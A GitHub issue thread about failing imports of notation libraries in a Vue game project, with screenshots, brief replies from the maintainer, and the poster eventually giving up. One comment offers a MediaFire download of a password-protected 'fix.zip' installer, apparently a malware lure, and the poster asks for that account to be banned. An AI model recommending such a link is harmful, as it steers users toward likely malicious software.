### ISSUE TITLE
import failed

### ISSUE THREAD

**Issue by antimatter19728** [HexaVault/BEnotations-Pre#2]
I want to make a game([link](https://github.com/antimatter19728/example-vue-app)), but import doesn't work.
Broken code(in src/core/format.js):
```js
import { ADNotations, ADCommunityNotations } from 'adnot-beport-small'
import { ADBNotations } from 'adnot-beport-large'
````

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by antimatter19728** [comment]
@HexaVault 
command:
```
npm run dev
```
Bug screenshot:
![1](https://github.com/user-attachments/assets/cff0c950-9bd6-4ff3-ae24-72ea0b38d370)

**Comment by antimatter19728** [comment]
@HexaVault 
**AND, BAN @JONTY650413 FROM THIS REPOSITORY!!!**

**Comment by HexaVault** [comment]
I will dw.

By the way, have you got the break_eternity library installed aswell?

**Comment by HexaVault** [comment]
also you are reporting this in the wrong repository, you want post not pre

**Comment by antimatter19728** [comment]
> I will dw.
> 
> By the way, have you got the break_eternity library installed aswell?
@HexaVault 
but
```js
import { ADNotations, ADCommunityNotations } from 'adnot-beport-small'
```
still can't work.
Bug screenshots:
![1](https://github.com/user-attachments/assets/ef56c534-305a-42c6-92e7-ee456321dc0f)
![2](https://github.com/user-attachments/assets/4cc9bf2f-ef58-4be0-bd4d-a6c11ab89e4e)
![3](https://github.com/user-attachments/assets/78c2254e-c834-4955-b682-f0debe39fae2)

**Comment by antimatter19728** [comment]
@HexaVault 
Yes,but it still can't work.
Screenshots:
![1](https://github.com/user-attachments/assets/8de382f9-4289-431b-ac00-f1717ac586ed)
![2](https://github.com/user-attachments/assets/3f5b35f6-2ca2-4c01-bda2-d6753d86fd6c)
![3](https://github.com/user-attachments/assets/42e3d938-89da-48f7-9f8b-b3f3f5b1f0fe)

**Comment by antimatter19728** [comment]
@HexaVault 
**Bad news: I scrapped my app😭**
